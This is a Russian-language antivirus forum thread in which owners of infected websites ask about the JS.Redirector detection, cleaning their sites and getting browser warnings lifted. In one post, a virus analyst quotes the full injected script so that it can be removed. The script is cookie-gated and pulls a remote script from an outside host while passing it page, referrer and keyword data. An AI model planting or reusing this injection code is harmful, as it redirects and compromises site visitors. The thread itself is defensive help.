Перейти к содержимому


Фото
- - - - -

JS.Redirector.304


  • Please log in to reply
29 ответов в этой теме

#21 Elevyr

Elevyr

    Newbie

  • Posters
  • 26 Сообщений:

Отправлено 13 Сентябрь 2016 - 14:55

 

А как снять предупреждение от DrWeb, что этот www.душаженщины.рф сайт инфицирован?

Я скрипт на нём удалил, а кому писать чтобы сняли предупреждение?

Снял детект.

 

Спасибо!



#22 Victor_koly

Victor_koly

    Member

  • Posters
  • 344 Сообщений:

Отправлено 14 Сентябрь 2016 - 20:49

AVG (LinkScaner) блокирует отображение темы (первая страница) со ссылкой из первого поста. Но не уверен, что у них есть очистка базы ссылок.


Сообщение было изменено Victor_koly: 14 Сентябрь 2016 - 20:54


#23 TASS

TASS

    Advanced Member

  • Posters
  • 921 Сообщений:

Отправлено 17 Сентябрь 2016 - 14:51

AVG (LinkScaner) блокирует отображение темы (первая страница) со ссылкой из первого поста
Victor_koly, Dr.Web = AVG ?

Но не уверен, что у них есть очистка базы ссылок.
Не уверен, что сотрудники Dr.Web или пользователи Dr.Web могут Вам помочь с очисткой базы ссылок AVG.

Глядя на мир, нельзя не удивляться! ©


#24 killbill2

killbill2

    Newbie

  • Posters
  • 3 Сообщений:

Отправлено 17 Октябрь 2016 - 15:24

Добрый день, у меня тоже сайт заражен. Помогите решить проблему с ним. Скачал все файлы на свой комп через ftp. при скачивании dr web увидел вирус. Object-index.php, Threat-JS.Redirector.314. Как его вылечить? Если можно по шагам или кинуть ссылку по лечению.Спасибо заранее.


Сообщение было изменено killbill2: 17 Октябрь 2016 - 15:25


#25 Dmitry Shutov

Dmitry Shutov

    Poster

  • Virus Hunters
  • 1 686 Сообщений:

Отправлено 17 Октябрь 2016 - 17:20

Файл уберите с форума (( , аналитики точно скажут...

 

https://www.virustotal.com/en/file/f8db2cba1e0693e2710d326d844891492bef54c0c92d9756da1cba4efeec3e12/analysis/1476713760/

http://jsunpack.jeek.org/?report=d277b228bfd19ae688564bbc555e1136a4e9ed6d



#26 Dmitry Shutov

Dmitry Shutov

    Poster

  • Virus Hunters
  • 1 686 Сообщений:

Отправлено 17 Октябрь 2016 - 17:40

Вот на форуме Eset человек обратился с так же детектом (только от Node)

 

https://forum.eset.com/topic/9808-how-do-i-tell-if-a-site-is-blocked-by-eset-or-the-warning-is-based-on-detection/

 

Вот смотрите 

 

https://sitecheck.sucuri.net/results/www.touchtec.biz/

http://urlquery.net/report.php?id=1476714827405

http://online5.drweb.com/cache/?i=e9c2818b5f7c5e94af0b435a0f0f18b9

 

У нас детект добавили 15 числа, ESet 11 числа.



#27 Ivan Korolev

Ivan Korolev

    Poster

  • Virus Analysts
  • 1 368 Сообщений:

Отправлено 17 Октябрь 2016 - 18:17

Скрипт удалите со страницы и посмотрите, нет ли его еще где-нибудь.

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://www.jmoden.de/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'J18171' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Сообщение было изменено Ivan Korolev: 17 Октябрь 2016 - 18:17


#28 killbill2

killbill2

    Newbie

  • Posters
  • 3 Сообщений:

Отправлено 21 Октябрь 2016 - 09:11

Всем спасибо огромное!!!



#29 tata27

tata27

    Newbie

  • Members
  • 1 Сообщений:

Отправлено 28 Май 2017 - 14:28

Добрый день!

Благодаря вашим советам, сайт почистила.

Благодарю! :))

Но теперь осталась проблема:

как снять предупреждение в браузере Гугл Хром, что сайт www.apriorisvaha.ru инфицирован?

Подскажите, пожалуйста, 



#30 pig

pig

    Бредогенератор

  • Helpers
  • 10 855 Сообщений:

Отправлено 28 Май 2017 - 15:16

Это у Гугла спрашивайте.
Почтовый сервер Eserv тоже работает с Dr.Web


Читают тему: 1

0 пользователей, 1 гостей, 0 скрытых